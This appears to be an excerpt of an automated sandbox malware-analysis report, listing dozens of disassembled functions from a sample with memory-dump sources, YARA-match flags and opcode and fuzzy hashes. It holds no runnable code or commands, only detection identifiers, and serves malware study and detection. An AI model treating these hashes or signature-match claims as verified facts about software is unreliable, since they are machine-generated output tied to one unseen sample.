                                                                                                                                                                                                                                                                • Opcode ID: e201d641cfe25c641c2468e7a3483f4a9060aee4472faa5ea81c6e7fcc7eb0d8
                                                                                                                                                                                                                                                                • Instruction ID: 473c7c0e01890161c42436878ad5ddc7d20691f55e5b146572409273c410520a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e201d641cfe25c641c2468e7a3483f4a9060aee4472faa5ea81c6e7fcc7eb0d8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CAD1F575609700DBD3209F15D8417EBB3A5FFD6354F184A6EE8C98B391EB389840C79A
                                                                                                                                                                                                                                                                Function 02108055 Relevance: .4, Instructions: 415COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 1cec13f25c1f28221c4ff8f3f288699f7ddc068973911e15d4e3164317524c23
                                                                                                                                                                                                                                                                • Instruction ID: 4a1f5c0aec2b1864857774f339e35672471d9c065d8412942654b76754f62ef4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1cec13f25c1f28221c4ff8f3f288699f7ddc068973911e15d4e3164317524c23
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 38B134766887509FD3248B99C8C0ABFB7D2BB99310F1E993DD5C2A7691C3B09804C796
                                                                                                                                                                                                                                                                Function 004266D0 Relevance: .4, Instructions: 412COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: acc099de19a44bf00ce16e18c4be42564cbb2e2978226dbcdc14d31531569d8c
                                                                                                                                                                                                                                                                • Instruction ID: 0d04b2c2fa50837e9638c4fbed55210e4b06bf37a5b46dbaee5e4e245b9bea77
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: acc099de19a44bf00ce16e18c4be42564cbb2e2978226dbcdc14d31531569d8c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 91B15C717043614BEB18DF24E85266B77A2EB81304F5AC53EE8859B386D63CDC09C79A
                                                                                                                                                                                                                                                                Function 02116937 Relevance: .4, Instructions: 412COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 91e403f7bf2fe428c8ff2ae1696841098b740060b83e87f0c1d5348c1599076f
                                                                                                                                                                                                                                                                • Instruction ID: a8498cdc54b49a54ccad824e356f94892f2a3bdded662e083008d813c3ed6735
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91e403f7bf2fe428c8ff2ae1696841098b740060b83e87f0c1d5348c1599076f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22B128B17843954FEB28CE248851BBB779AEF81304F09C53DE8858B385D736D909C791
                                                                                                                                                                                                                                                                Function 0040EA10 Relevance: .4, Instructions: 411COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 918cd65cbadabd6da86d83a30b2b2da0488193a68d8c3fca759c00fcea01beb3
                                                                                                                                                                                                                                                                • Instruction ID: c845803a38f6c77acddbfa9eef1216980ece3764384c33bb2f9187d8778c445e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 918cd65cbadabd6da86d83a30b2b2da0488193a68d8c3fca759c00fcea01beb3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2BF1C0F0904B40AFC3A5CF3AC942797BEECEB0A360F14491EF5AEC2241D73561458BA6
                                                                                                                                                                                                                                                                Function 020FEC77 Relevance: .4, Instructions: 411COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 918cd65cbadabd6da86d83a30b2b2da0488193a68d8c3fca759c00fcea01beb3
                                                                                                                                                                                                                                                                • Instruction ID: 0c155b4e194a847bcd7227a96d39b03245999ce3adee6db801bfeb3d75141549
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 918cd65cbadabd6da86d83a30b2b2da0488193a68d8c3fca759c00fcea01beb3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5CF1C0F0914B40AFC3A5CF3AC946797BEECEB0A260F14491EF5EEC2641D73165458BA2
                                                                                                                                                                                                                                                                Function 0041FC75 Relevance: .4, Instructions: 387COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 455de48da1b395ee01d158247e6300201ea3688789ea299f7cc6c50f6c6940d8
                                                                                                                                                                                                                                                                • Instruction ID: 41c3e091da67547de47b3906f8a28cdcf4f9a35dde57214a1a091a27875e02c3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 455de48da1b395ee01d158247e6300201ea3688789ea299f7cc6c50f6c6940d8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F0024861508BC18ED3268B3C8848A56BFD26BA6224F0DC79DD4E94F7E3C279D506C762
                                                                                                                                                                                                                                                                Function 0210FEDC Relevance: .4, Instructions: 387COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 455de48da1b395ee01d158247e6300201ea3688789ea299f7cc6c50f6c6940d8
                                                                                                                                                                                                                                                                • Instruction ID: 4611ac215784f38675ba720f7e280040a946bea9a546a14a108d328684a9cb92
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 455de48da1b395ee01d158247e6300201ea3688789ea299f7cc6c50f6c6940d8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A021761508BC18ED326CB3C8848A16BFD26B66224F0EC79CD4E94B7E3D779D506C762
                                                                                                                                                                                                                                                                Function 00426B95 Relevance: .4, Instructions: 356COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 53eb30f04210c5aa1d7ea8e5a987f3c65e47ecdc85497fc231301112acc4fb82
                                                                                                                                                                                                                                                                • Instruction ID: 8f62d820d698011493e9b4d33d56c28701bf8a730f1a894cccb9041d930e3295
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 53eb30f04210c5aa1d7ea8e5a987f3c65e47ecdc85497fc231301112acc4fb82
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4B148B5E00565CFCF10CF59E8417AEB7B1AF0A304F5A407AD899AB342D7399D01CBA9
                                                                                                                                                                                                                                                                Function 0043F330 Relevance: .3, Instructions: 349COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: 78baf6bead69bc787f6e498b6209c58df4768a7a1f3029cd250c3ec1940b1aee
                                                                                                                                                                                                                                                                • Instruction ID: 3d8e549ead381eb5a41ee94ce64dad1362128fe91ea456cb5e2966e39e4c66ca
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 78baf6bead69bc787f6e498b6209c58df4768a7a1f3029cd250c3ec1940b1aee
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A3B12536A083129BC724CF28C88056BB7E2FF99700F19953DEA8697366E735DC06D785
                                                                                                                                                                                                                                                                Function 0212F597 Relevance: .3, Instructions: 349COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 43a38f77119da688ac3ac81b48a3df6363d837cca15ab4ad9599a2e3d82993cc
                                                                                                                                                                                                                                                                • Instruction ID: cb6cc02844bdacdf2647c895378169765fc783f564a9bc402d4d3c00ace9d1da
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 43a38f77119da688ac3ac81b48a3df6363d837cca15ab4ad9599a2e3d82993cc
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EAB1F536A583618BC728CF28C48056BB7F2FB89704F19852CFA8697765E7319C56CB81
                                                                                                                                                                                                                                                                Function 0041DE80 Relevance: .3, Instructions: 337COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 98cb35be4dcf6147bb54d841e08aa9a7e406920ae8f199def00657b733b42f8a
                                                                                                                                                                                                                                                                • Instruction ID: 8a51dd8e2965cc9f0c4013a2f6a7698077ed2e8ce9dcff126952d1e9ceec8530
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 98cb35be4dcf6147bb54d841e08aa9a7e406920ae8f199def00657b733b42f8a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EFB15579904301AFDB108F25DC41B5ABBE2BFD8314F144A3EF898932A1D776DD668B06
                                                                                                                                                                                                                                                                Function 0210E0E7 Relevance: .3, Instructions: 337COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 3c637dafc4c5c02bba21bf8384fb5f02d2acdfb7e2cfb5a4e70ebd11587584d3
                                                                                                                                                                                                                                                                • Instruction ID: 0f409e261d9e0e0b34bca8056202dd50c7335d0811fa732e7108744841a4f4af
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c637dafc4c5c02bba21bf8384fb5f02d2acdfb7e2cfb5a4e70ebd11587584d3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46B10671548301AFD7249F25DC81B1ABBE2BFD8354F648A2CF498932E0D7B29925CF42
                                                                                                                                                                                                                                                                Function 021123F7 Relevance: .3, Instructions: 330COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: dd71efafbe3cc21deb18af7b1feb0adcacd6565e9113104d404282071b8f505b
                                                                                                                                                                                                                                                                • Instruction ID: c4ecf2f7d150219de502610b6c81aee969d4f7df188b3b2bd5aaa2f9231b7f5b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd71efafbe3cc21deb18af7b1feb0adcacd6565e9113104d404282071b8f505b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E09114B2A443119BD7249F24C8A1BBBB3B5EF81718F05482CED869B380E775EC04C796
                                                                                                                                                                                                                                                                Function 02106F35 Relevance: .3, Instructions: 326COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: d66196a234f06480f41816911af9b4ea699047e9e12ae4b8e975acb0d7698cc7
                                                                                                                                                                                                                                                                • Instruction ID: ff19ca43a3dbd87ba0595b2d5ed2b5feac7c6ac05064e4b4614c48bb82674ae3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d66196a234f06480f41816911af9b4ea699047e9e12ae4b8e975acb0d7698cc7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09A104729583118BC324CF24C8906ABF7E1FFD9754F1A8A2DE8C59B3A4E7749941C782
                                                                                                                                                                                                                                                                Function 0043EFB0 Relevance: .3, Instructions: 320COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: 69f7ea7b3bcfd880a0eef8db25e79bddcc6229897a0f740fc9fa50f79ffe9049
                                                                                                                                                                                                                                                                • Instruction ID: 3187122ed07642cbe4dcf9e03264eeaa439871456ea8a6719abbd84e200541cd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 69f7ea7b3bcfd880a0eef8db25e79bddcc6229897a0f740fc9fa50f79ffe9049
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4EA11436A043018BC718DF28D99092BB3F2EBC9710F1A957DE9869B365EB35DC05CB46
                                                                                                                                                                                                                                                                Function 0212F217 Relevance: .3, Instructions: 320COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 73df037b7ed471f27b11ebbe38ccb4fbfbef165bc0754b8ed2e20a33442e0b7b
                                                                                                                                                                                                                                                                • Instruction ID: 9d089b4936bc826f9e3e04b00b302834d30bf3138ff4b7f5ceda86475c5aff9e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 73df037b7ed471f27b11ebbe38ccb4fbfbef165bc0754b8ed2e20a33442e0b7b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E1A1D2366442218BC718DF28D99092BB3F2EFC5714F1A856CF9868B754DB31EC26CB81
                                                                                                                                                                                                                                                                Function 00406280 Relevance: .3, Instructions: 303COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: bc4bfdbd75c94b69f0a0099a9aec3f3e1abf52cef7a5ad0f4f638173c0b64b08
                                                                                                                                                                                                                                                                • Instruction ID: afe5d4654f5e8657962bc42cc500043a3620e9a043509faccf93fb76782c58a6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bc4bfdbd75c94b69f0a0099a9aec3f3e1abf52cef7a5ad0f4f638173c0b64b08
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DBC15BB29087418FC360CF28DC96BABB7F1BF85318F09492DD1DAD6242E778A155CB46
                                                                                                                                                                                                                                                                Function 020F64E7 Relevance: .3, Instructions: 303COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: bc4bfdbd75c94b69f0a0099a9aec3f3e1abf52cef7a5ad0f4f638173c0b64b08
                                                                                                                                                                                                                                                                • Instruction ID: 7ee2f1e4c67bd946770ab34e1a53c651db6f09fe0b356cdb40b84778fdbadd77
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bc4bfdbd75c94b69f0a0099a9aec3f3e1abf52cef7a5ad0f4f638173c0b64b08
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6C18EB2A487418FC3A0CF68CC86BABB7E5FF85318F08492DD2D9C6642D779A155CB05
                                                                                                                                                                                                                                                                Function 0042830D Relevance: .3, Instructions: 301COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: eca7b8087cccba19e5979cf0e8330dd1936bd6a3fecaafeec36cf51b3ab145d2
                                                                                                                                                                                                                                                                • Instruction ID: 652f8e9b795bdad566c10a3835dfc4d237c9f110778e3a4e594c84154d78986c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eca7b8087cccba19e5979cf0e8330dd1936bd6a3fecaafeec36cf51b3ab145d2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43914C72754B1A4BC714DE6CDC9066EB6D2ABD4210F4D423CD8958B3C2EF78AD0587C5
                                                                                                                                                                                                                                                                Function 00429C2B Relevance: .3, Instructions: 298COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 6c996c3f4605880eb5795293c8fc84fa0ba55b563aa94cfbc2b65958c9b9224e
                                                                                                                                                                                                                                                                • Instruction ID: 89cd8c3f6ac805753dcfa7ea52abb159a623b373aaffce4ab273b97bd3830c78
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6c996c3f4605880eb5795293c8fc84fa0ba55b563aa94cfbc2b65958c9b9224e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CFB10575608790DFD714DF24E891A2BB7E2EF8A314F488A6DF0D5872A2D7388905CB16
                                                                                                                                                                                                                                                                Function 0043ECA0 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: 7757ad35b4d3f19014e5b0218f9aa537273a9f10abc5234e4bd6fc32e4c2e1b2
                                                                                                                                                                                                                                                                • Instruction ID: cf6a0fb400f3c0121e69896af41eb3d2a2b4280c5d577effd33442f2baf9bc8c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7757ad35b4d3f19014e5b0218f9aa537273a9f10abc5234e4bd6fc32e4c2e1b2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CB81AE326053019BC7249F29C85067FB3A2FFC8710F2AD42DE9868B395EB349C52D785
                                                                                                                                                                                                                                                                Function 0212EF07 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
